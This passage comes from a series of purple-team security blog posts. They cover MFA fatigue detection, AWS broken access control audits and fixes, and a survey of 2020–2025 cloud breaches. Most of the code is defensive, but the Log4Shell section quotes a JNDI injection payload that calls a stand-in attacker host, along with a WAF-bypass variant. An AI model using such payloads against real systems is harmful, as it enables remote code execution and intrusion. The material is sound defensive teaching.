Tier Examples Timeline
Tier 0 — immediate Cloud admin, IAM admin, Okta admin, DNS admin Week 1
Tier 1 — 30 days All engineers with production access Month 1
Tier 2 — 90 days All employees with SSO access Month 3
Contractors Scope-limited access, enforce at boundary Immediate

Fix 2: Number Matching (Intermediate Mitigation)

If hardware keys cannot be deployed immediately, number matching significantly reduces MFA fatigue effectiveness. Instead of a simple “approve/deny” push, the user must match a number shown on the login screen to a number shown in the authenticator app. This breaks the fatigue pattern — the attacker cannot trigger an approval without the user actively entering the correct number.

# Duo: Enable number matching
# Duo Admin Console → Policies → Duo Push Number Matching: Required

# Microsoft Authenticator: Enable number matching
# Azure AD → Security → Authentication methods → Microsoft Authenticator
# Enable: "Require number matching for push notifications"

# Okta Verify: Enable TOTP-bound push
# Okta Admin → Security → Multifactor → Okta Verify → Enable "Number Challenge"

Fix 3: Detect and Block — Automated Response to Fatigue Pattern

#!/usr/bin/env python3
# Purple Team EP05 — MFA Fatigue Auto-Response
# Monitors Okta System Log; suspends user on fatigue pattern detection
# Run as a Lambda function or scheduled script in your SIEM pipeline

import boto3
import requests
import json
from datetime import datetime, timedelta

OKTA_DOMAIN = "your-org.okta.com"
OKTA_TOKEN = "your-okta-api-token"  # use Secrets Manager in production
SNS_TOPIC_ARN = "arn:aws:sns:us-east-1:123456789012:security-alerts"

def get_recent_mfa_events(hours=1):
    since = (datetime.utcnow() - timedelta(hours=hours)).strftime("%Y-%m-%dT%H:%M:%SZ")
    url = f"https://{OKTA_DOMAIN}/api/v1/logs"
    params = {
        "filter": 'eventType eq "user.authentication.auth_via_mfa"',
        "since": since,
        "limit": 1000
    }
    headers = {"Authorization": f"SSWS {OKTA_TOKEN}"}
    response = requests.get(url, params=params, headers=headers)
    return response.json()

def detect_fatigue_pattern(events, failure_threshold=3, window_minutes=10):
    user_events = {}
    for event in events:
        user_id = event["actor"]["id"]
        user_name = event["actor"]["displayName"]
        result = event["outcome"]["result"]
        timestamp = event["published"]

        if user_id not in user_events:
            user_events[user_id] = {"name": user_name, "events": []}
        user_events[user_id]["events"].append({"result": result, "time": timestamp})

    fatigue_users = []
    for user_id, data in user_events.items():
        events_sorted = sorted(data["events"], key=lambda x: x["time"])
        failures = [e for e in events_sorted if e["result"] == "FAILURE"]

        if len(failures) >= failure_threshold:
            # Check if a success followed the failures
            last_failure_time = failures[-1]["time"]
            successes_after = [
                e for e in events_sorted
                if e["result"] == "SUCCESS" and e["time"] > last_failure_time
            ]
            if successes_after:
                fatigue_users.append({
                    "user_id": user_id,
                    "user_name": data["name"],
                    "failure_count": len(failures),
                    "success_after_failures": True
                })

    return fatigue_users

def alert_security_team(fatigue_users):
    sns = boto3.client("sns")
    message = f"MFA FATIGUE ALERT — {len(fatigue_users)} user(s) detected:\n"
    for user in fatigue_users:
        message += f"  - {user['user_name']}: {user['failure_count']} failures then success\n"

    sns.publish(
        TopicArn=SNS_TOPIC_ARN,
        Subject="Purple Team: MFA Fatigue Attack Detected",
        Message=message
    )

def lambda_handler(event, context):
    events = get_recent_mfa_events(hours=1)
    fatigue_users = detect_fatigue_pattern(events)
    if fatigue_users:
        alert_security_team(fatigue_users)
    return {"fatigue_users_detected": len(fatigue_users)}

Fix 4: Privileged Access Workstations and Session Recording

The Uber breach succeeded because the attacker found hardcoded credentials on a file share accessible to contractors. The downstream fix after identity:

# Ensure no scripts or configuration files contain credentials
# Run TruffleHog against your internal repositories and file shares
trufflehog filesystem /path/to/internal/share \
  --json \
  --include-detectors=all \
  2>/dev/null | \
  jq '{file: .SourceMetadata.Data.Filesystem.file, detector: .DetectorName, verified: .Verified}'

Run This in Your Own Environment: MFA Audit

#!/bin/bash
# Purple Team EP05 — MFA Coverage Audit
# Checks for push-MFA users who are A07 exposure without hardware key enrollment

echo "=== AWS: Console Users Without MFA ==="
aws iam generate-credential-report > /dev/null 2>&1
sleep 5
aws iam get-credential-report --query 'Content' --output text | base64 -d | \
  awk -F',' 'NR>1 && $4=="true" && $8=="false" {
    print "  USER: " $1 " | Console: " $4 " | MFA: " $8
  }'

echo ""
echo "=== AWS: IAM Users with Long-Lived Access Keys (rotation risk) ==="
aws iam get-credential-report --query 'Content' --output text | base64 -d | \
  awk -F',' 'NR>1 && $9!="N/A" {
    cmd = "date -d " $10 " +%s"
    cmd | getline key_date; close(cmd)
    now = systime()
    age_days = int((now - key_date) / 86400)
    if (age_days > 90) print "  USER: " $1 " | KEY AGE: " age_days " days"
  }'

echo ""
echo "=== RECOMMENDATION ==="
echo "  - Any console user without MFA = immediate A07 exposure"
echo "  - For accounts with Okta/Azure AD: run IdP-specific audit above"
echo "  - Hardware FIDO2 keys required for all admin accounts"

⚠ Common Mistakes When Responding to MFA Fatigue Risk

Mandating security training as the primary response. The Uber contractor was experienced. Training did not fail — the attacker exploited a social engineering vector that training cannot structurally prevent. Hardware keys remove the social engineering surface entirely.

Implementing “number matching” and considering MFA fatigue solved. Number matching makes fatigue attacks harder, not impossible. A sophisticated attacker can relay the number in real time via voice call (“what number do you see on your screen?”). It buys time; it does not eliminate the attack class.

Requiring MFA for employees but not contractors. The Uber breach was a contractor account. Contractor access policies tend to have looser MFA requirements because contractors often resist corporate MDM on personal devices. The solution is to scope contractor access tightly and require hardware key MFA at the access boundary, not push MFA.

Not monitoring for the failure-then-success pattern. The Okta System Log, Azure AD Sign-in Logs, and Duo Admin Panel all have the data to detect MFA fatigue in real time. Most organizations generate these logs but do not have detection rules for the pattern. The detection is straightforward; the investment is adding the rule to your SIEM.

Forgetting session tokens. The Okta breach was not MFA fatigue — it was session token theft. An attacker who can steal a valid session token does not need to beat MFA at all. Session token lifetime, storage security, and re-authentication requirements for sensitive operations are separate controls that address this variant.


Quick Reference

Attack Variant Mechanism Structural Fix
Push notification flood Attacker initiates logins repeatedly until user accepts FIDO2 hardware key MFA
Social engineering layer Attacker contacts user claiming to be IT support Hardware key (physical presence required)
Session token theft Steal valid session without needing MFA at all Short session lifetime + re-auth for sensitive ops
Number matching bypass Relay number via voice call in real time Hardware key (no relay possible)
SIM swap Port victim’s phone number to attacker’s SIM; receive OTP Hardware key (phone-independent)

Key Takeaways

  • An MFA fatigue attack exploits push notification UX — training users to tap “deny” competes with a trained habit of tapping “accept”; hardware keys eliminate the attack surface by requiring physical presence
  • The Uber breach (2022) was MFA fatigue + hardcoded credentials in a file share — two OWASP categories chained (A07 + A02)
  • Detection is straightforward: multiple MFA failures followed by a success in a short window — this pattern exists in every IdP’s logs; adding the detection rule is the work
  • Number matching is a meaningful intermediate mitigation; it is not a structural fix
  • Hardware FIDO2 keys are the structural fix — they require physical presence and are phishing-resistant by design
  • Tier-0 accounts (cloud admin, IAM admin, Okta admin) cannot wait for the phased rollout — hardware keys on day one
  • Session token theft (CircleCI, Okta support breach) is a related A07 variant: even perfect MFA is bypassed if a valid session token is exfiltrated

What’s Next

EP06 covers CI/CD secrets exposure — how pipeline breaches work, why storing credentials in environment variables is structurally dangerous, and how the CircleCI breach exposed secrets that teams thought were safely stored. The structural answer is OIDC workload identity (IAM EP07): short-lived credentials that cannot be exfiltrated because they don’t exist until the moment they’re needed.

Get EP06 in your inbox when it publishes → subscribe at linuxcent.com

Broken Access Control in AWS: From Misconfigured S3 to Admin

Reading Time: 9 minutes

What is purple team securityOWASP Top 10 mapped to cloud infrastructureCloud security breaches 2020–2025Broken access control in AWS


TL;DR

  • Broken access control in AWS is OWASP A01 — the most common cloud security failure, covering IAM wildcards, public S3 buckets, and overly broad trust policies
  • A public S3 bucket containing 47 million customer records went undetected for six months in an authorized assessment — no GuardDuty finding, no AWS Config alert, because those controls weren’t enabled
  • The red phase: three commands to identify public buckets, enumerate IAM over-permissions, and test trust policy abuse — all with read-only access on your own account
  • The blue phase: two AWS Config managed rules and one GuardDuty finding type that cover the majority of A01 findings
  • The purple phase: deny-based SCPs, bucket public access blocks, and IAM Access Analyzer — structural controls, not monitoring alerts
  • Cross-series: IAM privilege escalation paths (IAM EP08) and AWS least privilege audit (IAM EP09) go deeper on the IAM layer

OWASP Mapping: A01 Broken Access Control — primarily. A09 Logging and Monitoring Failures — the six-month detection gap demonstrates A09 as an amplifier of A01.


The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│              BROKEN ACCESS CONTROL — ATTACK SURFACE                 │
│                                                                     │
│   INTERNET                    AWS ACCOUNT                           │
│                                                                     │
│   Attacker ──────────────▶  S3 bucket (public read)                 │
│                             └── 47M customer records                │
│                                                                     │
│   Attacker ──────────────▶  IAM user with "Action": "*"             │
│   (compromised creds)        └── escalate → admin access            │
│                                                                     │
│   Attacker ──────────────▶  Trust policy: "AWS": "*"                │
│   (any AWS account)          └── assume role from attacker's        │
│                                  account                            │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│                                                                     │
│   DETECTION GAPS (A09 amplifying A01):                              │
│   • S3 public access not in AWS Config rules                        │
│   • GuardDuty not enabled                                           │
│   • No IAM Access Analyzer                                          │
│   • No SCP boundary on public bucket creation                       │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘

Broken access control in AWS is the infrastructure equivalent of OWASP A01: a principal can reach a resource it should not be able to reach, because the access control decision was either not made or made incorrectly. In the cloud context, this manifests as public S3 buckets, IAM policies with wildcard actions and resources, and trust policies that allow any principal rather than a specific, scoped entity.


The Assessment That Changed My Approach to Access Control Auditing

During an authorized assessment, I found an S3 bucket containing 47 million customer records. The bucket name was generic — no obvious PII signal in the name itself. It was created two years prior by an engineer who was troubleshooting a data pipeline and needed temporary public access to share data with an external partner. The partner relationship ended. The bucket access was never reverted.

The bucket had been public for six months at the time I found it. I checked the AWS Config rules: S3 public access was not in the rule set. GuardDuty was enabled but no finding had fired — GuardDuty generates a Policy:S3/BucketAnonymousAccessGranted finding when public access is enabled, but only if the finding is new during GuardDuty’s monitoring window. The bucket went public before GuardDuty was enabled.

No alert ever fired. Not because the tools couldn’t detect it — because the tools weren’t configured to look.

This is A01 amplified by A09. The broken access control is the public bucket. The six-month window is the logging and monitoring failure.


Red Phase: How Broken Access Control Works in Practice

The red team perspective on broken access control starts with enumeration. What can this principal reach that it shouldn’t be able to reach?

Enumerating Public S3 Buckets

aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    # Check account-level block
    account_block=$(aws s3control get-public-access-block \
      --account-id $(aws sts get-caller-identity --query Account --output text) \
      2>/dev/null | jq -r '.PublicAccessBlockConfiguration.BlockPublicAcls')

    # Check bucket-level policy
    policy=$(aws s3api get-bucket-policy-status --bucket "$bucket" 2>/dev/null | \
      jq -r '.PolicyStatus.IsPublic')

    # Check bucket ACL
    acl=$(aws s3api get-bucket-acl --bucket "$bucket" 2>/dev/null | \
      jq -r '.Grants[] | select(.Grantee.URI == "http://acs.amazonaws.com/groups/global/AllUsers") | .Permission')

    if [ "$policy" = "true" ] || [ -n "$acl" ]; then
      echo "PUBLIC BUCKET: $bucket (policy_public=$policy, acl_grants=$acl)"
    fi
  done

Enumerating Overly Permissive IAM Policies

# Find all customer-managed policies with wildcard actions
aws iam list-policies --scope Local --query 'Policies[].Arn' --output text | \
  tr '\t' '\n' | \
  while read arn; do
    version=$(aws iam get-policy --policy-arn "$arn" \
      --query 'Policy.DefaultVersionId' --output text)
    doc=$(aws iam get-policy-version --policy-arn "$arn" --version-id "$version" \
      --query 'PolicyVersion.Document' --output json)

    if echo "$doc" | jq -e '.Statement[] | select(.Effect == "Allow" and .Action == "*")' > /dev/null 2>&1; then
      echo "WILDCARD ACTION POLICY: $arn"
      echo "$doc" | jq '.Statement[] | select(.Effect == "Allow" and .Action == "*")'
    fi
  done

Testing Trust Policy Abuse

# Find IAM roles with overly broad trust policies
# Specifically: trust policies that allow any AWS account or service
aws iam list-roles --query 'Roles[].{Name:RoleName,Arn:Arn}' --output json | \
  jq -r '.[].Arn' | \
  while read role_arn; do
    trust=$(aws iam get-role --role-name "$(basename $role_arn)" \
      --query 'Role.AssumeRolePolicyDocument' --output json 2>/dev/null)

    # Check for wildcard principals
    if echo "$trust" | jq -e '.Statement[] | select(.Principal == "*")' > /dev/null 2>&1; then
      echo "WILDCARD TRUST PRINCIPAL: $role_arn"
    fi

    # Check for cross-account trust without conditions
    if echo "$trust" | jq -e '.Statement[] | select(.Principal.AWS | type == "string" and test("arn:aws:iam::[0-9]+:root"))' > /dev/null 2>&1; then
      account_in_trust=$(echo "$trust" | jq -r '.Statement[] | .Principal.AWS // empty' | grep -oP '(?<=arn:aws:iam::)[0-9]+')
      current_account=$(aws sts get-caller-identity --query Account --output text)
      if [ "$account_in_trust" != "$current_account" ]; then
        echo "CROSS-ACCOUNT TRUST (verify scope): $role_arn trusts account $account_in_trust"
      fi
    fi
  done

Simulating S3 Exfiltration (on your own bucket — safe test)

# Create a test bucket, make it public, verify it's accessible without credentials
# Do this in a non-production account only

TEST_BUCKET="purple-team-test-$(date +%s)"
aws s3 mb s3://${TEST_BUCKET} --region us-east-1

# Disable the public access block (simulates the misconfiguration)
aws s3api put-public-access-block \
  --bucket "${TEST_BUCKET}" \
  --public-access-block-configuration \
  "BlockPublicAcls=false,IgnorePublicAcls=false,BlockPublicPolicy=false,RestrictPublicBuckets=false"

# Add a public-read bucket policy
aws s3api put-bucket-policy --bucket "${TEST_BUCKET}" --policy '{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": "*",
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::'"${TEST_BUCKET}"'/*"
  }]
}'

# Put a test file
echo "PURPLE_TEAM_TEST_DATA" | aws s3 cp - s3://${TEST_BUCKET}/test.txt

# Verify it's accessible without credentials
curl -s "https://${TEST_BUCKET}.s3.amazonaws.com/test.txt"
# Should return: PURPLE_TEAM_TEST_DATA

echo ""
echo "Test complete. Clean up:"
echo "aws s3 rb s3://${TEST_BUCKET} --force"

Blue Phase: What Detection Looks Like

What AWS Config Catches

Two managed rules cover the majority of S3 broken access control findings:

# Enable the S3 public access rules in AWS Config
# (requires Config to already be enabled)

# Rule 1: s3-bucket-public-read-prohibited
aws configservice put-config-rule --config-rule '{
  "ConfigRuleName": "s3-bucket-public-read-prohibited",
  "Source": {
    "Owner": "AWS",
    "SourceIdentifier": "S3_BUCKET_PUBLIC_READ_PROHIBITED"
  },
  "Scope": {
    "ComplianceResourceTypes": ["AWS::S3::Bucket"]
  }
}'

# Rule 2: s3-account-level-public-access-blocks-periodic
aws configservice put-config-rule --config-rule '{
  "ConfigRuleName": "s3-account-level-public-access-blocks-periodic",
  "Source": {
    "Owner": "AWS",
    "SourceIdentifier": "S3_ACCOUNT_LEVEL_PUBLIC_ACCESS_BLOCKS_PERIODIC"
  }
}'

# Check current compliance status
aws configservice describe-compliance-by-config-rule \
  --config-rule-names s3-bucket-public-read-prohibited \
  --query 'ComplianceByConfigRules[].{Rule:ConfigRuleName,Compliance:Compliance.ComplianceType}'

What GuardDuty Catches

GuardDuty generates these findings for S3 broken access control:

Finding Type Trigger Severity
Policy:S3/BucketAnonymousAccessGranted Bucket policy or ACL grants public read/write Medium
Policy:S3/BucketPublicAccessGranted Same as above — alternate finding type Medium
Discovery:S3/MaliciousIPCaller S3 GetObject from a known malicious IP High
# Query GuardDuty findings for S3 public access violations
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": ["Policy:S3/BucketAnonymousAccessGranted", "Policy:S3/BucketPublicAccessGranted"]
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {type: .Type, bucket: .Resource.S3BucketDetails[0].Name, severity: .Severity}'

What IAM Access Analyzer Catches

IAM Access Analyzer continuously analyzes resource policies for external access — S3 buckets, IAM roles, KMS keys, SQS queues, Lambda functions. It generates a finding any time a resource policy grants access to a principal outside the AWS account (or AWS Organization boundary).

# Enable IAM Access Analyzer for the account
aws accessanalyzer create-analyzer \
  --analyzer-name "account-access-analyzer" \
  --type ACCOUNT

# List all active findings (external access granted)
aws accessanalyzer list-findings \
  --analyzer-arn $(aws accessanalyzer list-analyzers --query 'analyzers[0].arn' --output text) \
  --filter '{"status": {"eq": ["ACTIVE"]}}' \
  --query 'findings[].{Resource:resource,Principal:principal,Action:action}' \
  --output table

What the CloudTrail Event Looks Like

When an anonymous user accesses a public S3 object:

{
  "eventVersion": "1.09",
  "userIdentity": {
    "type": "AWSAccount",
    "accountId": "ANONYMOUS_PRINCIPAL",  
    "principalId": "ANONYMOUS_PRINCIPAL"
  },
  "eventTime": "2024-03-15T02:47:00Z",
  "eventSource": "s3.amazonaws.com",
  "eventName": "GetObject",
  "requestParameters": {
    "bucketName": "your-bucket-name",
    "key": "customer-data/records.csv"
  },
  "sourceIPAddress": "198.51.100.1",
  "userAgent": "python-requests/2.28.0"
}

The signal: userIdentity.type = "AWSAccount" with accountId = "ANONYMOUS_PRINCIPAL" on a GetObject event. This is a read from an anonymous, unauthenticated principal.

# CloudTrail Insights query (Athena) to find anonymous S3 GetObject events
# Assumes CloudTrail S3 data events are enabled for the bucket

SELECT
  eventTime,
  sourceIPAddress,
  requestParameters.bucketName,
  requestParameters.key,
  userIdentity.type,
  userIdentity.accountId
FROM cloudtrail_logs
WHERE
  eventName = 'GetObject'
  AND userIdentity.type = 'AWSAccount'
  AND userIdentity.accountId = 'ANONYMOUS_PRINCIPAL'
  AND eventTime > current_timestamp - interval '7' day
ORDER BY eventTime DESC
LIMIT 100;

Purple Phase: The Structural Fix

Detection catches broken access control after the fact. The structural fix prevents it from being possible.

Fix 1: Account-Level S3 Public Access Block

This is a single setting that prevents any bucket in the account from becoming public — regardless of bucket policy or ACL. It overrides bucket-level settings.

# Enable account-level S3 public access block
aws s3control put-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text) \
  --public-access-block-configuration \
  "BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true"

# Verify
aws s3control get-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text)

Fix 2: SCP to Prevent Disabling the Public Access Block

An SCP (Service Control Policy) at the AWS Organizations level that prevents any account from disabling the public access block — even an account administrator.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyS3PublicAccessBlockDisable",
      "Effect": "Deny",
      "Action": [
        "s3:PutBucketPublicAccessBlock",
        "s3:DeletePublicAccessBlock"
      ],
      "Resource": "*",
      "Condition": {
        "ArnNotLike": {
          "aws:PrincipalArn": "arn:aws:iam::*:role/s3-public-access-exception-role"
        }
      }
    }
  ]
}
# Apply the SCP to your organizational unit
aws organizations create-policy \
  --name "DenyS3PublicAccessBlockDisable" \
  --type SERVICE_CONTROL_POLICY \
  --content file://scp-deny-s3-public-access.json \
  --description "Prevents disabling S3 public access block at account level"

Fix 3: IAM Policy Cleanup — Remove Wildcards

For IAM policies with wildcard actions, the fix is least-privilege replacement. This is not a quick operation — it requires analyzing actual usage and scoping to what is actually needed.

# Use IAM Access Analyzer policy generation to generate a least-privilege policy
# based on actual CloudTrail activity for a role
aws accessanalyzer start-policy-generation \
  --policy-generation-details '{
    "principalArn": "arn:aws:iam::123456789012:role/your-role-name"
  }' \
  --cloud-trail-details '{
    "accessRole": "arn:aws:iam::123456789012:role/access-analyzer-cloudtrail-role",
    "trailProperties": [{
      "cloudTrailArn": "arn:aws:cloudtrail:us-east-1:123456789012:trail/your-trail",
      "regions": ["us-east-1", "us-west-2"],
      "allRegions": false
    }],
    "startTime": "2024-01-01T00:00:00Z",
    "endTime": "2024-03-01T00:00:00Z"
  }'

# Retrieve the generated policy
JOB_ID="<returned-job-id>"
aws accessanalyzer get-generated-policy --job-id "${JOB_ID}"

For a systematic audit approach, the AWS least privilege audit process in IAM EP09 covers how to move from wildcard policies to scoped permissions methodically across a multi-account environment.

Fix 4: IAM Access Analyzer with Automated Archiving

# Create an archive rule for known-good cross-account access
# (prevents alert fatigue from legitimate cross-account patterns)
aws accessanalyzer create-archive-rule \
  --analyzer-name "account-access-analyzer" \
  --rule-name "archive-legitimate-cross-account" \
  --filter '{
    "principal.AWS": {
      "contains": ["arn:aws:iam::111122223333:role/legitimate-cross-account-role"]
    }
  }'

Run This in Your Own Environment: A01 Audit

Run this in any AWS account you own or have read-only access to audit:

#!/bin/bash
# Purple Team EP04 — Broken Access Control (A01) Audit
# Safe to run with read-only IAM permissions

ACCOUNT=$(aws sts get-caller-identity --query Account --output text)
echo "Auditing account: ${ACCOUNT}"
echo "==============================="

echo ""
echo "[A01-1] S3 Account-Level Public Access Block"
aws s3control get-public-access-block --account-id "${ACCOUNT}" 2>/dev/null || \
  echo "  FINDING: Account-level public access block not configured"

echo ""
echo "[A01-2] S3 Buckets with Public Access"
aws s3api list-buckets --query 'Buckets[].Name' --output text | tr '\t' '\n' | \
  while read bucket; do
    status=$(aws s3api get-bucket-policy-status --bucket "$bucket" 2>/dev/null | \
      jq -r '.PolicyStatus.IsPublic // "false"')
    if [ "$status" = "true" ]; then
      echo "  FINDING: Public bucket: $bucket"
    fi
  done

echo ""
echo "[A01-3] IAM Roles with Wildcard Trust Policies"
aws iam list-roles --query 'Roles[].RoleName' --output text | tr '\t' '\n' | head -50 | \
  while read role; do
    trust=$(aws iam get-role --role-name "$role" \
      --query 'Role.AssumeRolePolicyDocument.Statement' 2>/dev/null)
    if echo "$trust" | jq -e '.[] | select(.Principal == "*")' > /dev/null 2>&1; then
      echo "  FINDING: Wildcard trust principal in role: $role"
    fi
  done

echo ""
echo "[A01-4] IAM Access Analyzer — Active External Access Findings"
ANALYZER=$(aws accessanalyzer list-analyzers --query 'analyzers[0].arn' --output text 2>/dev/null)
if [ -z "$ANALYZER" ]; then
  echo "  FINDING: IAM Access Analyzer not enabled"
else
  aws accessanalyzer list-findings \
    --analyzer-arn "${ANALYZER}" \
    --filter '{"status": {"eq": ["ACTIVE"]}}' \
    --query 'findings[].{Resource:resource,Type:resourceType}' \
    --output table
fi

⚠ Common Mistakes When Fixing Broken Access Control in AWS

Fixing the symptom at the bucket level without the account-level block. If you set RestrictPublicBuckets=true on individual buckets but leave the account-level block unset, the next bucket created by another engineer starts with public access possible again. The account-level block is the structural control; the bucket-level setting is defense-in-depth.

Not enabling CloudTrail S3 data events. CloudTrail management events capture bucket creation and policy changes. They do not capture GetObject and PutObject by default — that requires enabling S3 data events, which adds cost. Without data events, you cannot see who accessed what in a public bucket. If you can’t afford data events on all buckets, enable them on buckets containing sensitive data.

Treating IAM Access Analyzer findings as one-time. Access Analyzer runs continuously. A new resource policy that grants external access generates a new finding. If you archive findings without fixing the underlying policy, you lose visibility. Archive only findings that represent intentional, documented cross-account access.

Confusing “no GuardDuty findings” with “no problem.” GuardDuty’s Policy:S3/BucketAnonymousAccessGranted only fires when access is newly granted during GuardDuty’s monitoring window. A bucket that was made public before GuardDuty was enabled will not generate a finding — GuardDuty does not retroactively scan all bucket policies. Use AWS Config for retroactive compliance checks; use GuardDuty for real-time detection of new violations.

For the full IAM attack chain that broken access control enables — including IAM privilege escalation paths via iam:PassRole — see IAM series EP08. The privilege escalation analysis belongs alongside the access control audit.


Quick Reference

Control What It Does AWS Service
Account-level S3 public access block Prevents any bucket from becoming public S3 Control
SCP: deny public access block disable Prevents disabling the account-level block Organizations
AWS Config: S3_BUCKET_PUBLIC_READ_PROHIBITED Flags buckets that are or become public AWS Config
GuardDuty: Policy:S3/BucketAnonymousAccessGranted Detects new public access grants GuardDuty
IAM Access Analyzer Finds all resources with external access grants Access Analyzer
CloudTrail S3 data events Captures GetObject/PutObject for audit CloudTrail
IAM policy generation Generates least-privilege policy from actual usage Access Analyzer

Key Takeaways

  • Broken access control in AWS (OWASP A01) is the most common cloud security failure — IAM wildcards, public S3, and broad trust policies are the three primary manifestations
  • A public S3 bucket with 47 million records was active for six months without a single alert — because the detection controls (AWS Config rules, GuardDuty) weren’t enabled to look for it
  • The structural fix is the account-level S3 public access block enforced by SCP — detection tools catch violations; the SCP prevents the violation from being possible
  • IAM Access Analyzer provides continuous visibility into every resource that grants external access — enable it in every account
  • The red phase can be run with read-only permissions against your own account — the audit script above reveals your current A01 exposure in under five minutes
  • Fixing A01 without enabling the A09 controls (CloudTrail data events, GuardDuty, AWS Config) leaves you blind to whether the fix is working
  • Use Access Analyzer’s policy generation feature to move from wildcard policies to least-privilege without guessing

What’s Next

EP05 covers MFA fatigue attacks — how the Uber and Okta breaches worked at the authentication layer, how to simulate push-notification fatigue in a test environment, and the structural fix: phishing-resistant MFA using FIDO2 hardware keys. The identity layer is where most cloud compromises start — understanding how push MFA fails is the prerequisite for knowing why hardware keys are the only structural answer.

Get EP05 in your inbox when it publishes → subscribe at linuxcent.com

Cloud Security Breaches 2020–2025: What Actually Got Exploited

Reading Time: 11 minutes

What is purple team securityOWASP Top 10 mapped to cloud infrastructureCloud security breaches 2020–2025


TL;DR

  • Cloud security breaches from 2020 to 2025 cluster into three root causes: identity compromise, supply chain compromise, and misconfiguration — every major incident falls into at least one
  • SolarWinds (Dec 2020): build pipeline compromise — attacker signed malware with a legitimate cert (A08)
  • Log4Shell (Dec 2021): injection in a logging library present in millions of Java apps (A03)
  • Uber (Sep 2022): MFA fatigue against a contractor → hardcoded admin creds on internal share (A07 + A02)
  • CircleCI (Jan 2023): session token stolen from an engineer’s laptop → CI/CD secrets exfiltrated (A07 + A08)
  • Okta (Oct 2023): support system access via stolen credentials → customer tenant data exposed (A07)
  • XZ Utils (Apr 2024): 2-year social engineering campaign → backdoor in release tarball (A08 + A06)
  • The attack surface does not change — only the specific vector within each category

OWASP Mapping: This episode is cross-category — A01 through A10 all appear. Each breach is annotated with its primary OWASP mapping.


The Big Picture

┌────────────────────────────────────────────────────────────────────┐
│           2020–2025 BREACH TIMELINE                                │
│                                                                    │
│  Dec 2020    Dec 2021    Sep 2022    Jan 2023    Oct 2023  Apr 2024 │
│     │            │           │           │           │        │    │
│     ▼            ▼           ▼           ▼           ▼        ▼    │
│  Solar-      Log4Shell     Uber       CircleCI     Okta    XZ Utils│
│  Winds                                                             │
│                                                                    │
│  ══════════════════════════════════════════════════════════        │
│                                                                    │
│  Root Cause Categories (3 total):                                  │
│                                                                    │
│  SUPPLY CHAIN          IDENTITY               MISCONFIGURATION     │
│  SolarWinds            Uber                   Capital One (2019)   │
│  XZ Utils              Okta                   CircleCI (partial)   │
│  Log4Shell (partial)   CircleCI (initial)                          │
│                                                                    │
│  OWASP Primaries:                                                  │
│  A08 → A07 → A07 → A07/A08 → A07 → A08/A06                       │
│                                                                    │
└────────────────────────────────────────────────────────────────────┘

The cloud security breaches from 2020 to 2025 reveal a consistent pattern: attackers are not finding new classes of vulnerability. They are exploiting the same three root causes — identity, supply chain, misconfiguration — in different combinations against different technology stacks.


Why These Breaches Are the Curriculum

Every episode in this series from EP04 onward takes a specific attack path from these incidents and walks through the simulation, detection, and fix. You cannot understand the fix without understanding the breach mechanics. And you cannot understand why your detection didn’t fire without knowing what the attacker actually did.

This episode is the reference. When EP05 covers MFA fatigue, it builds on the Uber anatomy here. When EP09 covers XZ Utils, the supply chain mechanics here are the foundation.


December 2020: SolarWinds — Supply Chain at Scale

OWASP: A08 (Software and Data Integrity Failures)

SolarWinds is the incident that defined supply chain attacks for the decade. The attacker — attributed to Russia’s SVR — compromised the build environment for SolarWinds Orion IT monitoring software in early 2020. They inserted a backdoor called SUNBURST into the software build pipeline.

The mechanics:

Normal build pipeline:
  Source code → Build system → Sign with SolarWinds cert → Distribute → Customer installs

Compromised pipeline (SolarWinds):
  Source code → Build system → [SUNBURST injected here] → Sign with SolarWinds cert → Distribute → 18,000 customers install

SUNBURST was signed with SolarWinds’ legitimate Authenticode certificate. It passed signature verification. It was distributed through the normal software update mechanism. Customers with automatic updates installed it because the update was signed by a trusted vendor.

The backdoor remained dormant for 12–14 days after installation before activating. It used DGA (domain generation algorithm) to contact C2 infrastructure, disguising traffic as Orion telemetry. After the initial beaconing period, the attacker manually selected targets from the 18,000 infected environments.

Confirmed affected organizations: US Treasury, US Commerce Department, FireEye, Microsoft, Intel, Deloitte.

What a detection would have looked like:
– Unexpected outbound DNS queries to avsvmcloud.com subdomains
– Orion software making network connections outside its normal profile
– New scheduled tasks or service modifications by the Orion process

The structural failure: The build system was not isolated, not monitored for unexpected behavior, and the build process itself was not reproducible from source. A reproducible build would have made the SUNBURST injection detectable — the build output would not match the source.


December 2021: Log4Shell — Injection in a Logging Library

OWASP: A03 (Injection), A06 (Vulnerable and Outdated Components)

Log4Shell (CVE-2021-44228) is the closest thing to a universal vulnerability that existed in the 2020s. Log4j 2.x was embedded in thousands of Java applications — not as a direct dependency but as a transitive dependency, often several layers deep in the dependency tree. Developers frequently didn’t know they were running it.

The vulnerability: Log4j evaluated JNDI (Java Naming and Directory Interface) lookups embedded in logged strings. Any input that ended up in a log message could trigger a JNDI lookup:

${jndi:ldap://attacker.com/exploit}

# Log4j evaluates the expression, makes LDAP request to attacker.com
# Attacker's LDAP server responds with a Java class
# Log4j loads and executes the class
# Result: remote code execution

The attack was trivial to launch and extremely difficult to fully enumerate exposure for — because Log4j was present as a transitive dependency in components that teams didn’t know they owned.

What made it particularly bad for cloud infrastructure:
– Lambda functions, ECS containers, EKS workloads, and Elastic Beanstalk apps all potentially affected
– WAFs were initially bypassed with encoding variants (${${lower:j}ndi:...})
– The vulnerable class wasn’t in the primary JAR — it was in log4j-core, which appeared as an indirect dependency

# Find Java applications that might include log4j (rough scan — requires access to filesystems)
find / -name "log4j*.jar" -o -name "log4j-core*.jar" 2>/dev/null

# In a Kubernetes context — check running container images for log4j
